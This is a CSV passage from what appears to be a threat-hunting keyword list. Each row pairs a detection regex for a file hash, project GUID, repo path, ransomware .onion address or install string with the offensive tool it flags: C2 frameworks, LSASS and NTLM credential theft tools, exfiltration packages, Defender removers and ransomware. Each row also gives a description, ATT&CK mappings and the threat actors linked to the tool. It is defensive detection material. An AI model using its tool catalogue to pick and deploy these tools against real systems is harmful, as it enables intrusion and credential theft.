- COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37802" "*ccf676c0d9c215b6de3a3219688e3f5e20a7a21191ef6a25b382c2c0ec19a7e2*",".{0,1000}ccf676c0d9c215b6de3a3219688e3f5e20a7a21191ef6a25b382c2c0ec19a7e2.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37805" "*ccf7f162f257c3cf8286009cfcd0869bc7bd78d38635f1b473d89c737b8fd2ff*",".{0,1000}ccf7f162f257c3cf8286009cfcd0869bc7bd78d38635f1b473d89c737b8fd2ff.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37806" "*CCHOST=127.0.0.1*/tmp/c2*",".{0,1000}CCHOST\=127\.0\.0\.1.{0,1000}\/tmp\/c2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37809" "*cckuailong/reapoc*",".{0,1000}cckuailong\/reapoc.{0,1000}","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","N/A","7","681","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z","37810" "*cclauss/WinPwnage*",".{0,1000}cclauss\/WinPwnage.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools 
for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","37811" "*CcmExec might not be installed on target*",".{0,1000}CcmExec\smight\snot\sbe\sinstalled\son\starget.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","37812" "*CcmExec service not accessible on remote system! :(*",".{0,1000}CcmExec\sservice\snot\saccessible\son\sremote\ssystem!\s\:\(.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","37813" "*CCob/BOF.NET*",".{0,1000}CCob\/BOF\.NET.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37814" "*CCob/DRSAT*",".{0,1000}CCob\/DRSAT.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","37815" "*CCob/lsarelayx*",".{0,1000}CCob\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","37816" "*CCob/MirrorDump*",".{0,1000}CCob\/MirrorDump.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","37817" "*CCob/Shwmae*",".{0,1000}CCob\/Shwmae.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","37818" "*CCob/SweetPotato*",".{0,1000}CCob\/SweetPotato.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","37819" "*CCob/ThreadlessInject*",".{0,1000}CCob\/ThreadlessInject.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","37820" "*ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion*",".{0,1000}ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37821" "*cd DuckDuckC2*",".{0,1000}cd\s\sDuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","0","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","37822" "*cd 
./whereami/*",".{0,1000}cd\s\.\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","0","#linux","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","37824" "*cd ffuf*",".{0,1000}cd\sffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - 
TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","37825" "*cd golang_c2*",".{0,1000}cd\sgolang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","37826" "*cd inceptor*",".{0,1000}cd\sinceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","37827" "*cd katoolin3*",".{0,1000}cd\skatoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","0","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","37828" "*cd koadic*",".{0,1000}cd\skoadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","37829" "*cd ligolo*",".{0,1000}cd\sligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","37830" "*cd PurplePanda*",".{0,1000}cd\sPurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","37831" "*cd PyExfil*",".{0,1000}cd\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","37832" "*cd05b7676886e560400643e3852e64483cee95f4741ec8a930c7b1f68479835a*",".{0,1000}cd05b7676886e560400643e3852e64483cee95f4741ec8a930c7b1f68479835a.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. 
and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","0","#filehash","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","37833" "*cd075baa8305d9767316d5a2cc0ee60daf1f194a3c4b0d3386d1f8bd80f44907*",".{0,1000}cd075baa8305d9767316d5a2cc0ee60daf1f194a3c4b0d3386d1f8bd80f44907.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","37834" "*cd0b70d141e20db2b6ea5fa1c07a5310767f510a56ae8af7724fbd40f263bd6f*",".{0,1000}cd0b70d141e20db2b6ea5fa1c07a5310767f510a56ae8af7724fbd40f263bd6f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37835" "*cd16f1b53cc6746e79f6e2bed66d4017b9eee843fb52976fba170349cb0b7c3e*",".{0,1000}cd16f1b53cc6746e79f6e2bed66d4017b9eee843fb52976fba170349cb0b7c3e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37838" 
"*cd1c194264bf41748733be39fdcaa8ac2166f1121919a3b2eae1f03d873773a1*",".{0,1000}cd1c194264bf41748733be39fdcaa8ac2166f1121919a3b2eae1f03d873773a1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37840" "*cd1ddc6d2dd63df1769aa54a0febd2c11218f54350d8284c10e5fd2d396a5d7c*",".{0,1000}cd1ddc6d2dd63df1769aa54a0febd2c11218f54350d8284c10e5fd2d396a5d7c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37843" "*cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d*",".{0,1000}cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37844" "*CD257C0A-9071-42B4-A2FF-180622DBCA96*",".{0,1000}CD257C0A\-9071\-42B4\-A2FF\-180622DBCA96.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","37847" 
"*cd2e2beff40caf56b5102947d81e825f44b8df24d84f5dc49b1c850f4dca40a9*",".{0,1000}cd2e2beff40caf56b5102947d81e825f44b8df24d84f5dc49b1c850f4dca40a9.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37848" "*cd310c1827d7f9686c56b7ca259e8782a17964c23e93c932ae201f78ab046b20*",".{0,1000}cd310c1827d7f9686c56b7ca259e8782a17964c23e93c932ae201f78ab046b20.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","37849" "*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*",".{0,1000}CD3578F6\-01B7\-48C9\-9140\-1AFA44B3A7C0.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","37850" "*cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a*",".{0,1000}cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37851" "*cd40dbcdae84b1c8606f29342066547069ed5a33*",".{0,1000}cd40dbcdae84b1c8606f29342066547069ed5a33.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","37854" "*cd4104d015dd44e17397a87018f35850f0363f089b3232e5306addbd2b6b807a*",".{0,1000}cd4104d015dd44e17397a87018f35850f0363f089b3232e5306addbd2b6b807a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37855" "*cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34*",".{0,1000}cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37856" 
"*cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34*",".{0,1000}cd46607d2b9a3046748fea6f99f34ea9342653b82af06e20858a447cc58f0f34.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37857" "*cd4d53a9-2db8-4408-90a0-896b2bc4c9f8*",".{0,1000}cd4d53a9\-2db8\-4408\-90a0\-896b2bc4c9f8.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#GUIDproject","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","37859" "*cd4f7b330f78c41ce8f119e1bd4c14a2da54ed3f2b1482c18247acea6411d2a4*",".{0,1000}cd4f7b330f78c41ce8f119e1bd4c14a2da54ed3f2b1482c18247acea6411d2a4.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","37860" "*CD517B47-6CA1-4AC3-BC37-D8A27F2F03A0*",".{0,1000}CD517B47\-6CA1\-4AC3\-BC37\-D8A27F2F03A0.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#GUIDproject","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","37861" "*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37862" "*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37863" "*cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59*",".{0,1000}cd590c74718bd7644e143882c28506b16b13647e4bd0eda856e179cb3de1ee59.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37864" "*cd618bc8eaec4bf2397840938f63f50ddea5458918186a249af976bd081e166e*",".{0,1000}cd618bc8eaec4bf2397840938f63f50ddea5458918186a249af976bd081e166e.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37867" "*cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e*",".{0,1000}cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each 
other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37868" "*cd6857024c9a8bbb90a71a2bdaa72e13a0c7be30d288fe81eda8bb98785e5834*",".{0,1000}cd6857024c9a8bbb90a71a2bdaa72e13a0c7be30d288fe81eda8bb98785e5834.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","37869" "*cd73e2b32de14c58c3e27d833be05ec7fbfaf569ed10f18d47bf11352d6b4954*",".{0,1000}cd73e2b32de14c58c3e27d833be05ec7fbfaf569ed10f18d47bf11352d6b4954.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37870" 